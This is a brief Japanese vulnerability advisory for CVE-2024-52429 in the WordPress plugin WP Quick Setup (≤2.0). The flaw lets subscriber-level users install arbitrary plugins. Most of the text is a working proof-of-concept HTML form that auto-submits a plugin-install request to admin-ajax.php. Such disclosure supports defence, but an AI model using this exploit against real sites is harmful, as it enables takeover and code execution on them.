
WP Quick Setup <= 2.0 - 認証済み(購読者+)ユーザーによる任意のプラグイン/テーマインストールを許可する認可の欠落
WP Quick Setup <= 2.0 - 認証済み(購読者+)ユーザーによる任意のプラグイン/テーマインストールに対する認可の欠如
WordPress用WP Quick Setupプラグインは、2.0を含むすべてのバージョンにおいて、ある関数に対する権限チェックが欠如しているため、権限のないプラグインおよびテーマのインストールに対して脆弱です。これにより、
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
購読者としてログインし、このHTMLを実行してください。
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wes_install_plugins" />
<input type="hidden" name="plugin_urls[]" value="https://downloads.wordpress.org/plugin/wdes-responsive-mobile-menu.zip" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>